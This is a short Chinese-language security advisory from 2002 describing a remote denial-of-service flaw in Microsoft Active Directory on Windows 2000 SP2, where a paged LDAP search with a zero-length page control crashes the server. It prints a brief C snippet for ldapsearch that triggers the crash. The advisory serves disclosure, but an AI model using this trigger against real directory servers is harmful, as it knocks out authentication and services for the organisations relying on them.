Microsoft Active Directory零长度页面查询存在漏洞发布时间:2002-05-28 更新时间:2002-05-28 严重程度:中 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 BUGTRAQ ID:4804 受影响系统 Microsoft Windows 2000 Advanced Server SP2详细描述 Microsoft Active Directory存在漏洞,一个查询可导致Active Directory停止响应。 问题出现在通过GSS-API使用Kerberos V验证来查询Active Directory的环境下。 一个LDAP客户端可指定页面长度为零的情况下查询Active Directory,由于Active Directory没有检查零特殊的情况,客户端发送此类很大的请求可导致Active Directory崩溃。 如把下面的代码加入ldapsearch工具中: --------------------------------------- LDAPControl c; LDAPControl *ctrls[2]; ctrls[0] = &c; ctrls[1] = NULL; c.ldctl_oid = "1.2.840.113556.1.4.319"; c.ldctl_value.bv_val = NULL; c.ldctl_value.bv_len = 0; c.ldctl_iscritical = 0; ldap_set_option(ld,LDAP_OPT_SERVER_CONTROLS,ctrls); ---------------------------------------- 并向Active Directory执行paged search,可使Active Directory崩溃。 测试代码 见描述 解决方案 尚无 相关信息 Jonathan Lamberson <jlambers@umich.edu>. 参考:http://online.securityfocus.com/archive/1/273771 |
